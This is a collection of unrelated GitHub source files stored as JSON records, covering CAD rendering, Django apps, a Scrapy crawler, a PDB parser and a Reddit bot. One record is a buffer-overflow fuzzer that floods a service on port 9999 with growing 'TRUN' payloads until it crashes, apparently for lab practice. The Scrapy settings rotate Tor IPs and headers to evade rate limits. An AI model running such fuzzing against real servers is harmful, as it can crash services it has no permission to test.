cv2.line(mask, (int(p1[0]), int(p1[1])), (int(p2[0]), int(p2[1])), (255, 255, 255), 2)\n return color\n\n\ndef draw_lwpolyline(img, entity, color, mask):\n polyline = []\n a = np.array(entity.lwpoints.values).astype(int)\n while len(a) > 0:\n polyline.append((a[0], a[1]))\n a = a[5:]\n cv2.polylines(img, [np.array(polyline)], entity.closed, color, 1)\n cv2.polylines(mask, [np.array(polyline)], entity.closed, (255, 255, 255), 2)\n return color\n\n\ndef draw_arc(img, entity, color, mask):\n s = entity.dxf.start_angle * np.pi / 180\n e = entity.dxf.end_angle * np.pi / 180\n if s > e:\n s -= 2 * np.pi\n d = (e - s) / (int((e - s) * 180 / np.pi) + 1)\n r = entity.dxf.radius\n cx, cy = entity.dxf.center.xyz[:-1]\n angles = np.arange(s, e + d / 2, d)\n x = cx + r * np.cos(angles)\n y = cy + r * np.sin(angles)\n points = np.column_stack((x, y)).astype(int)\n cv2.polylines(img, [points], abs(s - e) < 1e-9, color, 1)\n cv2.polylines(mask, [points], abs(s - e) < 1e-9, (255, 255, 255), 2)\n return color\n\n\ndef draw_circle(img, entity, color, mask):\n r = entity.dxf.radius\n cx, cy = entity.dxf.center.xyz[:-1]\n cv2.circle(img, (int(cx), int(cy)), int(r), color, 1)\n cv2.circle(mask, (int(cx), int(cy)), int(r), (255, 255, 255), -1)\n return color\n\n\ndef draw_ellipse(img, entity, color, mask):\n cx, cy = entity.dxf.center.xyz[:-1]\n ma = entity.dxf.major_axis.magnitude\n angle = entity.dxf.major_axis.angle_deg\n mi = ma * entity.dxf.ratio\n s = entity.dxf.start_param * 180 / np.pi\n e = entity.dxf.end_param * 180 / np.pi\n if entity.dxf.extrusion.z == -1:\n s = 360 - s\n e = 360 - e\n cv2.ellipse(img, (int(cx), int(cy)), (int(ma), int(mi)), angle, s, e, color, 1)\n cv2.ellipse(mask, (int(cx), int(cy)), (int(ma), int(mi)), angle, s, e, (255, 255, 255), 1)\n return color\n\n\ndef draw_point(img, entity, color, mask):\n cx, cy = entity.dxf.location.xyz[:-1]\n cv2.circle(img, (int(cx), int(cy)), 0, color, 1)\n cv2.circle(mask, (int(cx), int(cy)), 0, (255, 255, 255), -1)\n return color\n\n\ndraw_map = {\n 'HATCH': draw_hatch,\n 'LINE': draw_line,\n 'LWPOLYLINE': draw_lwpolyline,\n 'ARC': draw_arc,\n 'CIRCLE': draw_circle,\n 'ELLIPSE': draw_ellipse,\n 'POINT': draw_point,\n}\n\n\ndef paint(in_path, out_path, config):\n doc = ezdxf.readfile(in_path)\n extmax, extmin = doc.header['$EXTMAX'], doc.header['$EXTMIN']\n xmin, ymin = np.floor(extmin[:-1]).astype(int)\n xmax, ymax = np.ceil(extmax[:-1]).astype(int)\n img = np.ones((ymax + ymin, xmax + xmin, 3), np.uint8) * 255\n mask = np.zeros_like(img)\n msp = doc.modelspace()\n layers = config.get('layers', {})\n colors = config.get('colors', {})\n # print(doc.layers.entries.keys())\n for layer_name, names in layers.items():\n color = tuple(colors.get(layer_name, [0, 0, 0]))\n for name in names:\n if name not in doc.layers:\n continue\n entities = msp.query('*[layer==\"%s\"]' % name)\n tmp = np.zeros((ymax + ymin, xmax + xmin), np.uint8)\n for entity in entities:\n if entity.DXFTYPE in draw_map:\n draw_map[entity.DXFTYPE](img, entity, color, tmp)\n else:\n print(\"%s: %s\" % (name, entity.DXFTYPE))\n contours, hierarchy = cv2.findContours(tmp, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n cv2.drawContours(mask, contours, -1, color, -1)\n\n res, img_png = cv2.imencode('.png', cv2.flip(img, 0))\n res, mask_png = cv2.imencode('.png', cv2.flip(mask, 0))\n with open(out_path, 'wb') as f:\n f.write(img_png.tobytes())\n with open(out_path[:-4] + \"_mask.png\", 'wb') as f:\n f.write(mask_png.tobytes())\n","repo_name":"maik-nack/rooms_painting","sub_path":"painter.py","file_name":"painter.py","file_ext":"py","file_size_in_byte":4460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12832131803","text":"#!/usr/bin/python3\nimport sys\nimport socket\nfrom time import sleep\n\nbuffer = \"A\" * 100\n\nwhile True:\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(10)\n s.connect(('192.168.0.234', 9999))\n s.send(('TRUN /.:/' + buffer).encode())\n s.settimeout(None)\n s.close()\n sleep(1)\n buffer = buffer + (\"A\" * 100)\n except Exception as ex:\n print(ex)\n lengthBuffer = len(buffer)\n print(\"Fuzzing crashed at {} bytes\".format(lengthBuffer))\n sys.exit()\n","repo_name":"nedzof/BufferOverflow","sub_path":"Fuzzing.py","file_name":"Fuzzing.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36538442752","text":"# import board\nimport busio\nimport adafruit_ssd1306\n\nfrom PIL import Image, ImageDraw, ImageFont\n\ni2c = busio.I2C(2, 4);\noled = adafruit_ssd1306.SSD1306_I2C(128, 32, i2c, addr=0x3C);\n\n# Load default font.\nfont = ImageFont.load_default()\n \n# Draw Some Text\ntext = \"Hello World!\"\n(font_width, font_height) = font.getsize(text)\ndraw.text(\n (oled.width // 2 - font_width // 2, oled.height // 2 - font_height // 2),\n text,\n font=font,\n fill=255,\n)\noled.fill(0)\noled.show()\n \n# Create blank image for drawing.\n# Make sure to create image with mode '1' for 1-bit color.\nimage = Image.new(\"1\", (oled.width, oled.height))\n \n# Get drawing object to draw on image.\ndraw = ImageDraw.Draw(image)","repo_name":"iceman198/simplefarmbench","sub_path":"python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35216571372","text":"import unittest\nfrom envs.tictactoe_env import TicTacToeEnv\nimport numpy as np\n\nclass MyTestCase(unittest.TestCase):\n def setUp(self):\n self.env = TicTacToeEnv()\n\n def test_reset(self):\n state = self.env.reset()\n self.assertTrue(np.array_equal(np.array([0, 0, 0, 0, 0, 0, 0, 0, 0]), state))\n\n def test_simple_game(self):\n e_reward, e_done = 0.0, False\n\n self.env.reset()\n state, reward, done = self.env.step(0)\n\n self.assertTrue(np.array_equal(1, state[0]))\n self.assertTrue(reward == self.env.default)\n self.assertEqual(e_done, done)\n\n def test_illegal_move(self):\n e_reward, e_done = 0.0, True\n\n self.env.reset()\n state, reward, done = self.env.step(8)\n\n opponent = np.argmin(state)\n\n state, reward, done = self.env.step(opponent)\n\n self.assertTrue(np.array_equal(1, state[8]))\n self.assertTrue(reward == self.env.illegal)\n self.assertEqual(e_done, done)\n\n def test_draw_or_win_or_loose(self):\n e_reward, e_done = 0.0, True\n\n self.env.reset()\n next_move = 8\n while(True):\n state, reward, done = self.env.step(next_move)\n if not done:\n next_move = np.where(state == 0)[0][0]\n else:\n break\n\n self.assertTrue(np.array_equal(1, state[8]))\n self.assertTrue(reward in [self.env.draw,self.env.win, self.env.lose])\n self.assertEqual(e_done, done)\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"cpuheater/tic-tac-toe-deep-rl-lab","sub_path":"tests/tictactoe_env_tests.py","file_name":"tictactoe_env_tests.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"38349106125","text":"# A simple HTTP server\n# The default port is 9000.\n# Usage: ``python3 server.py``\n\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom json import dumps, loads\n\nfrom models import model\n\nPORT = 9000\n\n\nclass ModelHandler(BaseHTTPRequestHandler):\n def do_POST(self):\n request_body = self.rfile.read(int(self.headers[\"Content-Length\"]))\n request_body = request_body.decode()\n request_body = loads(request_body)\n\n prompt = request_body[\"text\"]\n\n model_output = model(prompt)\n response_body = {\"keywords\": model_output}\n\n self.send_response(200)\n self.send_header(\"Content-type\", \"application/json\")\n self.end_headers()\n self.wfile.write(dumps(response_body).encode())\n\n\nwith HTTPServer((\"\", PORT), ModelHandler) as httpd:\n print(\"Serving at port\", PORT)\n httpd.serve_forever()\n\n","repo_name":"hajin-kim/finding-emo-model-server-template","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9715871704","text":"from django.test import TestCase\nfrom django.urls import reverse\n\nfrom contact.models import Contact\n\nclass ContactAppTests(TestCase):\n def test_contact_form_submission(self):\n # Create a test contact form data\n form_data = {\n 'name': 'John Doe',\n 'email': 'johndoe@example.com',\n 'message': 'Test message',\n }\n\n # Submit the contact form\n response = self.client.post(reverse('contact'), form_data)\n\n # Check that the form submission was successful\n self.assertEqual(response.status_code, 302) # Redirect response\n self.assertRedirects(response, reverse('contact'))\n\n # Check that the contact object was created in the database\n self.assertEqual(Contact.objects.count(), 1)\n contact = Contact.objects.first()\n self.assertEqual(contact.name, form_data['name'])\n self.assertEqual(contact.email, form_data['email'])\n self.assertEqual(contact.message, form_data['message'])\n","repo_name":"pouyanze/portfolio","sub_path":"contact/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13494312955","text":"import math \nimport argparse\nimport numpy as np\nimport pandas as pd\n\ndef read_pdb(fichier_pdb):\n \"\"\"Lecture d'un fichier PDB\n Extrait les coordonnées de tous les atomes de la protéine dans un data frame pandas et le renvoie.\"\"\"\n with open(fichier_pdb,\"r\") as pdb_file:\n liste_principale=[]\n for line in pdb_file:\n if line.startswith(\"ATOM\") or line.startswith(\"HETATM\"): \n sous_liste=[]\n sous_liste.append(line[0:6])\n sous_liste.append(int(line[6:11]))\n sous_liste.append(line[12:16].strip())\n sous_liste.append(line[16:17])\n sous_liste.append(line[17:20].strip())\n sous_liste.append(line[21:22])\n sous_liste.append(int(line[22:26]))\n sous_liste.append(line[26:27])\n sous_liste.append(float(line[30:38]))\n sous_liste.append(float(line[38:46]))\n sous_liste.append(float(line[46:54]))\n sous_liste.append(float(line[54:60]))\n sous_liste.append(float(line[60:66]))\n sous_liste.append(line[76:78])\n sous_liste.append(line[78:80])\n liste_principale.append(sous_liste)\n \n df= pd.DataFrame(liste_principale, columns = ['ATOM','atom_number','atom_name','location_indicator','residue_name',\\\n 'chain_identifier','residue_number','code','X','Y','Z',\\\n 'occupancy','temperature','symbol','charge'])\n return df\n\n\n\ndef write_pdb(df,nouveau_pdb):\n \"\"\" Ecriture d'un fichier PDB \n Prend le nom du nouveau fichier .pdb et de la data frame pandas dans le même format que celui défini \n précédemment et l'enregistre au format pdb.\"\"\"\n with open(nouveau_pdb,\"wt\") as inputfile:\n for i in range(len(df)):\n inputfile.write(\"{:6s}{:5d} {:^4s}{:1s}{:3s} {:1s}{:4d}{:1s} {:8.3f}{:8.3f}{:8.3f}{:6.2f}{:6.2f} {:>2s}{:2s}\\n\".format(df.iloc[i,0],df.iloc[i,1],df.iloc[i,2],\\\n df.iloc[i,3],df.iloc[i,4],df.iloc[i,5],df.iloc[i,6],df.iloc[i,7],\\\n df.iloc[i,8],df.iloc[i,9],df.iloc[i,10],df.iloc[i,11],\\\n df.iloc[i,12],df.iloc[i,13],df.iloc[i,14]))\n inputfile.write(\"TER\")\n return inputfile\n\ndef select_atoms(df,selector):\n \"\"\" Sélection d'atome \n Prend en entrée la data frame pandas et un selecteur et renvoi une data frame \"\"\"\n data = df\n for sele in selector: \n selection = data.loc[data[sele].isin(selector[sele])]\n return selection\n \n#def get_aa_seq(df):\n\n\ndef compute_distance(d1,d2):\n '''Calcul la distance entre deux atomes '''\n a = d1\n b= d2\n somme = 0 \n for row in ['X','Y','Z']:\n somme = somme + (b[row]-a[row])**2\n distance = math.sqrt(somme)\n return distance \n\n#def find_salt_bridges : \n\n#def contact_map():\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"AnissaMdahoma/Projet_python","sub_path":"python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36249450669","text":"import logging\nfrom utils.helpers import LoggerFilter\nfrom scrapy.utils.log import configure_logging \n\n\n\"\"\" General spider/bot settings \"\"\"\nCLOSESPIDER_ITEMCOUNT = 0 # Default: 0\nCLOSESPIDER_TIMEOUT = 0 # Default: 0 [sec]\nCLOSESPIDER_PAGECOUNT = 0 # Default: 0\nBOT_NAME = \"slangdictionary\"\nSPIDER_MODULES = [\"slangdictionary.spiders\"]\nNEWSPIDER_MODULE = \"slangdictionary.spiders\"\nALLOWED_DOMAINS = ['onlineslangdictionary.com'] \nSTART_URLS = ['http://onlineslangdictionary.com/word-list/0-a/']\nCUSTOM_SPIDER_SETTINGS = {'JOBDIR': './crawls'}\nROBOTSTXT_OBEY = False\n\n\"\"\" Configure a delay for requests for the same website \"\"\"\nRANDOMIZE_DOWNLOAD_DELAY = True \nDOWNLOAD_DELAY = 0.1 # Time [sec] to wait before downloading consecutive pages from the same website.\nDOWNLOAD_TIMEOUT = 30 # Time [sec] that the downloader will wait before timing out.\nCONCURRENT_REQUESTS_PER_DOMAIN = 16 # maximum number of concurrent requests performed to a single domain.\n\n\n\"\"\" Item pipeline configuration\"\"\"\nITEM_PIPELINES = {\n \"slangdictionary.pipelines.DefaultValuesPipeline\": 300,\n \"slangdictionary.pipelines.SavePipeline\": 310,\n}\n\n\"\"\" Spider middleware configuration \"\"\"\nSPIDER_MIDDLEWARES = {\n 'scrapy.spidermiddlewares.referer.RefererMiddleware': 10,\n}\n\n\"\"\" Downloader middleware configuration \"\"\"\nDOWNLOADER_MIDDLEWARES = {\n 'utils.middlewares.IPSwitchMiddleware': 450,\n 'utils.middlewares.HeadersMiddleware': 650,\n 'utils.middlewares.URLLoggerMiddleware': 950\n}\n\n# Retrying failed requests\nRETRY_ENABLED = True\nRETRY_TIMES = 5\nRETRY_HTTP_CODES = [400, 500, 502, 503, 504, 522, 524, 408, 429]\n\n# Tor handler \nTOR_ENABLED = True\nIP_CHANGE_CODES = RETRY_HTTP_CODES\nIP_SETTLE_TIME = 2 # Wait time for the new IP to \"settle in\"\n\n# Header generator - see random_header_generator package\nREFERER_ENABLED = True\nHEADER_GENERATOR_ENABLED = True\nREFERRER_POLICY = 'same-origin'\nHEADER_DEVICE_TYPE = 'desktop' \nHEADER_BROWSER_NAME = None\nHEADER_HTTP_VERSION = 1\nUSER_AGENTS = 'program'\n\n# URL Logger\nURL_LOG_ENABLED = True\nURL_LOG_DB = \"./url_logger.db\"\n\n\"\"\" Extensions configuration \"\"\"\nEXTENSIONS = {'utils.extensions.ProgressMonitor': 0}\nPROGRESS_MONITOR_ENABLED = True\nPROGRESS_MONITOR_STEP = 10\n\n\n\"\"\" Database-related settings \"\"\"\nDB = \"./slang_dict.db\"\n\nDB_PRAGMA = \"\"\"\n PRAGMA foreign_keys=OFF;\n PRAGMA journal_mode=WAL;\n PRAGMA synchronous=FULL;\n \"\"\"\n\nDB_SCHEMA = \"\"\"\n CREATE TABLE IF NOT EXISTS items (\n id INTEGER PRIMARY KEY,\n word TEXT NOT NULL,\n definition TEXT NOT NULL,\n users_used INTEGER,\n users_not_used INTEGER,\n users_heard INTEGER,\n users_not_heard INTEGER,\n vulgarity INTEGER\n ) STRICT; \n\"\"\"\n\n\"\"\" Logger configuration \"\"\"\nLOG_FILE = './logger.log'\nLOG_FORMAT = '%(levelname)s: %(message)s'\nLOG_LEVEL = logging.ERROR\nconfigure_logging(settings = {\"LOG_FILE\": LOG_FILE, \"LOG_FORMAT\": LOG_FORMAT, \"LOG_LEVEL\": LOG_LEVEL})\nlogging.getLogger('scrapy.core.scraper').addFilter(LoggerFilter())\n\n# Set settings whose default value is deprecated to a future-proof value\nREQUEST_FINGERPRINTER_IMPLEMENTATION = \"2.7\"\nTWISTED_REACTOR = \"twisted.internet.asyncioreactor.AsyncioSelectorReactor\"\nFEED_EXPORT_ENCODING = \"utf-8\"\n","repo_name":"Miltos-90/scrapy_examples","sub_path":"slangdictionary/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13044483259","text":"import logging\nimport utils.utils as utils\nfrom lib.scheduler import scheduler\nfrom lib.reddit import subreddit, get_latest_snapshot, process_comment\n\ndef main():\n # Start scheduler to update snapshot csv post data\n logging.info(\"Starting scheduler\")\n scheduler.start()\n \n # Get latest snapshot\n get_latest_snapshot()\n\n for comment in subreddit.stream.comments(skip_existing=True):\n try:\n process_comment(comment)\n except Exception as e:\n logging.error(f\"Failed to process comment: {e}\", exc_info=True)\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO, \n format='%(asctime)s - %(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S')\n logging.getLogger(\"apscheduler\").setLevel(logging.DEBUG)\n main()\n","repo_name":"mmackz/moonbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42735035289","text":"import os\nimport fnmatch\nimport re\nfrom texts.storage import Storage\n\ns = Storage(r'F:\\Yandex\\Sites\\jewTeX\\TEXTS_DB')\nresult = []\nfor root, dir, files in os.walk(r\"F:\\Yandex\\Sites\\jewTeX\\TEXTS_DB\"):\n # print(root)\n if not '.git' in root:\n # for items in fnmatch.filter(files, \"*\"):\n for items in files:\n filepath = os.path.join(root, items)\n with open(filepath,'r',encoding = 'utf8') as fin:\n text = fin.read()\n for subtext in re.findall('\\?\\?(.+?)\\?\\?', text):\n result.append([filepath, subtext])\n # result.append([filepath.replace(s.texts_path,'').split(os.path.sep)[1:], subtext])\n\nfor k in result:\n print(k)","repo_name":"Ishayahu/jewTeX","sub_path":"test/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1975224717","text":"import os, sys, requests, time, asyncio\nfrom twitchio.ext import commands\nfrom pubnub.callbacks import SubscribeCallback\nfrom pubnub.enums import PNStatusCategory\nfrom pubnub.pnconfiguration import PNConfiguration, PNReconnectionPolicy\nfrom pubnub.pubnub_asyncio import PubNubAsyncio\n\n# Based on https://dev.to/ninjabunny9000/let-s-make-a-twitch-bot-with-python-2nd8\n# Using https://github.com/TwitchIO/TwitchIO/blob/master/twitchio/\n\n\nclass Bot(commands.Bot):\n def __init__(self, irc_token, client_id, nick, prefix, initial_channels):\n super().__init__(\n token=os.environ['TMI_TOKEN'],\n client_id=os.environ['CLIENT_ID'],\n nick=os.environ['BOT_NICK'],\n prefix=os.environ['BOT_PREFIX'],\n initial_channels=initial_channels\n )\n\n async def event_ready(self):\n print(f'Logged in as | {self.nick}')\n\n\n async def event_message(self, ctx):\n '''Runs every time a message is sent in chat'''\n if ctx.author.name.lower() in [\"streamelements\", \"nightbot\", \"moobot\", os.environ['BOT_NICK'].lower()]:\n return\n\n text = ctx.content.lower()\n if 'pog' in text:\n # Clean up text and form list of keywords\n # e.g. from \"Man! That... is... POGGERSSS!!\" -> [\"man\", \"that\", \"is\", \"poggersss\"]\n replace_chars = \"\\\\`*_{}[](),>#+-.!?$\"\n for c in replace_chars:\n if c in text:\n text = text.replace(c, \"\")\n keywords = text.split(\" \")\n\n # Form an ordered list of deduplicated tokens (duplicate letters get removed)\n # e.g. from [\"man\", \"that\", \"is\", \"poggersss\"] -> [\"man\", \"tha\", \"is\", \"pogers\"]\n deduped = [\n ''.join(list(dict.fromkeys(list(keyword)).keys()))\n for keyword in keywords\n ]\n\n # Form a list of tokens that match one of the valid keywords\n # e.g. [\"man\", \"tha\", \"is\", \"pogers\"] will match on the last one, and we return the value (poggers)\n pogs = list(\n set(\n [VALID_POGS[k]\n for k in deduped if k in list(VALID_POGS.keys())]\n )\n )\n\n # For each unique instance of a matched keyword, post them to the API\n if len(pogs) > 0:\n user = ctx.author.display_name\n print(pogs[0] + \" from \" + user + \" in \" + str(ctx.channel))\n try:\n for pog in pogs:\n requests.post(\n api_base + 'pogs', json={\"channel\": str(ctx.channel), \"type\": pog, \"user\": ctx.author.display_name})\n except Exception as ex:\n print(ex)\n\n\nasync def pubnub_handler():\n class message_callback(SubscribeCallback):\n def presence(self, pubnub, presence):\n pass # handle incoming presence data\n\n def status(self, pubnub, status):\n if status.category == PNStatusCategory.PNUnexpectedDisconnectCategory:\n print(\"pubnub lost connection\")\n pass\n\n elif status.category == PNStatusCategory.PNConnectedCategory:\n print(\"connected to pubnub\")\n\n elif status.category == PNStatusCategory.PNReconnectedCategory:\n print(\"reconnected to pubnub\")\n pass\n\n elif status.category == PNStatusCategory.PNDecryptionErrorCategory:\n print(\"pubnub decryption error\")\n pass\n\n def message(self, pubnub, message):\n if message.message[\"cmd\"] == \"join\":\n print(\"Joining \" + message.message[\"value\"])\n loop.create_task(bot.join_channels([message.message[\"value\"]]))\n elif message.message[\"cmd\"] == \"part\":\n print(\"Leaving \" + message.message[\"value\"])\n loop.create_task(bot.part_channels([message.message[\"value\"]]))\n else:\n print(\"[Unknown PN Message]\", message.message)\n\n pubnub.add_listener(message_callback())\n pubnub.subscribe().channels(pubnub_channel).execute()\n\n\n# List of valid (de-duped) keywords to their correct words (e.g. poggerssss -> pogers maps to poggers)\nVALID_POGS = {\n 'pogcham': 'pogchamp',\n 'pogu': 'pogu',\n 'poger': 'poggers',\n 'pogers': 'poggers',\n 'pogerz': 'poggers',\n 'pog': 'pog'\n}\n\n\n# API Configuration\napi_base = os.environ['API_BASE']\n\n\n# Get initial channels to join (if API call fails, use those defined in .env)\ninitial_channels = os.environ['TWITCH_CHANNELS'].split(',')\ntry:\n response = requests.get(url=api_base + 'channels/active')\nexcept Exception as ex:\n print(ex)\nelse:\n if response.status_code == 200:\n initial_channels = response.json()[\"items\"]\n else:\n print(\"API returned \" + str(response.status_code) +\n \" when trying to retrieve active channels!\")\nprint(\"I will connect to these Twitch channels:\", initial_channels)\n\n\n# Twitch bot configuration\nbot = Bot(\n irc_token=os.environ['TMI_TOKEN'],\n client_id=os.environ['CLIENT_ID'],\n nick=os.environ['BOT_NICK'],\n prefix=os.environ['BOT_PREFIX'],\n initial_channels=initial_channels\n)\n\n# PubNub Configuration\npubnub_channel = os.environ['PUBNUB_CHANNEL']\npnconfig = PNConfiguration()\npnconfig.publish_key = os.environ['PUBNUB_PUBLISH_KEY']\npnconfig.subscribe_key = os.environ['PUBNUB_SUBSCRIBE_KEY']\npnconfig.reconnect_policy = PNReconnectionPolicy.LINEAR\npnconfig.uuid = 'megapog-SUB'\npubnub = PubNubAsyncio(pnconfig)\n\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n loop.run_until_complete(pubnub_handler())\n loop.run_until_complete(bot.run())\n loop.run_forever()\n","repo_name":"s00189168/OpenStackMegapog","sub_path":"chatbot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73531820568","text":"from django.db import models\nfrom django.urls import reverse\n# Create your models here.\n\nclass Post(models.Model):\n title = models.CharField(verbose_name = 'TITLE', max_length = 50)\n # 슬러그: 포스트를 설명하는 핵심 단어 집합, pk로 주로 사용\n slug = models.SlugField('SLUG', unique = True, allow_unicode = True, help_text = 'one word for title alieas')\n description = models.CharField('DESCRIPTION', max_length = 100, blank = True, help_text = 'simple descrition text')\n content = models.TextField('CONTENT')\n create_dt = models.DateTimeField('CREATE DATE', auto_now_add=True)\n modify_dt = models.DateTimeField('MODIFY DATE', auto_now = True)\n\n class Meta:\n verbose_name = 'post'\n verbose_name_plural = 'posts'\n db_table = 'blog_posts'\n ordering = ('-modify_dt',)\n\n def __str__(self):\n '''\n 객체의 문자열을 객체.title 속성으로 표시\n '''\n return self.title\n\n def get_absolute_url(self):\n '''\n 메소드가 정의된 객체를 지칭하는 url 반환\n '''\n # reverse: url 패턴을 만들어주는 함수\n return reverse('blog:post_detail', args=(self.slug,))\n\n def get_previous(self):\n '''\n modify_dt컬럼을 기준으로 최신 포스트를 반환하는 함수\n '''\n return self.get_previous_by_modify_dt()\n\n def get_next(self):\n '''\n modyfy_dt 컬럼을 기준으로 다음 ㅍ포스트를 반환\n '''\n return self.get_next_by_modify_dt()","repo_name":"shiney5213/Study-Programming","sub_path":"Django/pythonWepProgramming/blog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39160111450","text":"import yaml\nimport sys\nimport os\n\nfield=sys.argv[1]\nfile_name=sys.argv[2]\n\nvalue=''\n\ntry:\n with open(file_name) as fh:\n data = yaml.load(fh, Loader=yaml.FullLoader)\n value = data[field]\nexcept Exception as err:\n value = \"ERROR: %s\" % (str(err))\n\nsys.stdout.write(value)\nsys.stdout.flush()\nsys.exit(0)","repo_name":"bbrown-caltech/capstone-hangout-point","sub_path":"devops-tools/config/misc/yaml_parser.py","file_name":"yaml_parser.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8542146787","text":"# -*- mode: python -*-\na = Analysis(['.\\\\sudoku-cv.py'],\n pathex=['.'],\n hiddenimports=[],\n hookspath=None,\n runtime_hooks=None)\npyz = PYZ(a.pure)\nexe = EXE(pyz,\n a.scripts,\n exclude_binaries=True,\n name='Sudoku-CV.exe',\n debug=False,\n strip=None,\n upx=True,\n console=True , icon='.\\\\Resources\\\\Icon512.ico')\ncoll = COLLECT(exe,\n a.binaries,\n a.zipfiles,\n a.datas,\n strip=None,\n upx=True,\n name='Sudoku-CV')\n","repo_name":"tfeldmann/Sudoku","sub_path":"sudoku-cv-win.spec","file_name":"sudoku-cv-win.spec","file_ext":"spec","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"31"} +{"seq_id":"9323559593","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n#\r\n# Copyright (C) 2010 ZHENG Zhong \r\n#\r\n# Created on 2010-02-08.\r\n# $Id$\r\n#\r\n\r\nfrom django import forms\r\n\r\nfrom friday.common.errors import ProgrammingError, InvalidFormError\r\nfrom friday.apps.groups.models import Group, Member\r\n\r\n\r\nclass GroupForm(forms.Form):\r\n\r\n uid = forms.CharField(max_length=32, required=True)\r\n name = forms.CharField(max_length=128, required=True)\r\n slogan = forms.CharField(max_length=255, required=False)\r\n description = forms.CharField(required=False, widget=forms.Textarea)\r\n website = forms.URLField(required=False)\r\n google_group = forms.CharField(required=False)\r\n\r\n def __init__(self, data=None, instance=None):\r\n self._instance = instance\r\n if instance:\r\n initial = {\r\n \"uid\": instance.uid,\r\n \"name\": instance.name,\r\n \"slogan\": instance.slogan,\r\n \"description\": instance.description,\r\n \"website\": instance.website,\r\n \"google_group\": instance.google_group,\r\n }\r\n else:\r\n initial = None\r\n super(GroupForm, self).__init__(data=data, initial=initial)\r\n\r\n @property\r\n def instance(self):\r\n return self._instance\r\n\r\n def clean_website(self):\r\n return self.cleaned_data[\"website\"] or None\r\n\r\n def create(self, creator):\r\n if self._instance is not None:\r\n message = \"Failed to create group: this form is bound to an existing group.\"\r\n raise ProgrammingError(message)\r\n if not self.is_valid():\r\n raise InvalidFormError(self.errors)\r\n instance = Group.create(creator=creator, **self.cleaned_data)\r\n instance.save()\r\n return instance\r\n\r\n def update(self):\r\n if self._instance is None:\r\n message = \"Failed to update group: this form is not bound to a group.\"\r\n raise ProgrammingError(message)\r\n if not self.is_valid():\r\n raise InvalidFormError(self.errors)\r\n if self._instance.uid != self.cleaned_data[\"uid\"]:\r\n message = \"Group uid is read-only, and cannot be updated.\"\r\n raise ProgrammingError(message)\r\n for name, value in self.cleaned_data.items():\r\n if name != \"uid\":\r\n setattr(self._instance, name, value)\r\n self._instance.save()\r\n return self._instance\r\n\r\n\r\nclass PrettifyGroupForm(forms.Form):\r\n\r\n background_url = forms.URLField(required=False)\r\n logo_icon_url = forms.URLField(required=False)\r\n\r\n def __init__(self, data=None, instance=None):\r\n if not instance:\r\n message = \"Failed to create prettify group form: this form must be bound to a group.\"\r\n raise ProgrammingError(message)\r\n self._instance = instance\r\n initial = {\r\n \"background_url\": instance.background_url,\r\n \"logo_icon_url\": instance.logo_icon_url,\r\n }\r\n super(PrettifyGroupForm, self).__init__(data=data, initial=initial)\r\n\r\n @property\r\n def instance(self):\r\n return self._instance\r\n\r\n def clean_background_url(self):\r\n return self.cleaned_data[\"background_url\"] or None\r\n\r\n def clean_logo_icon_url(self):\r\n return self.cleaned_data[\"logo_icon_url\"] or None\r\n\r\n def update(self):\r\n if not self.is_valid():\r\n raise InvalidFormError(self.errors)\r\n for name, value in self.cleaned_data.items():\r\n setattr(self._instance, name, value)\r\n self._instance.save()\r\n return self._instance\r\n\r\n\r\nclass JoinGroupForm(forms.Form):\r\n\r\n request_message = forms.CharField(required=False, widget=forms.Textarea)\r\n\r\n def create(self, user, group):\r\n if not self.is_valid():\r\n raise InvalidFormError(self.errors)\r\n instance = Member.create(user=user, group=group, **self.cleaned_data)\r\n instance.save()\r\n return instance\r\n\r\n\r\nclass ReviewMemberForm(forms.Form):\r\n\r\n _APPROVE = \"approve\"\r\n _REJECT = \"reject\"\r\n 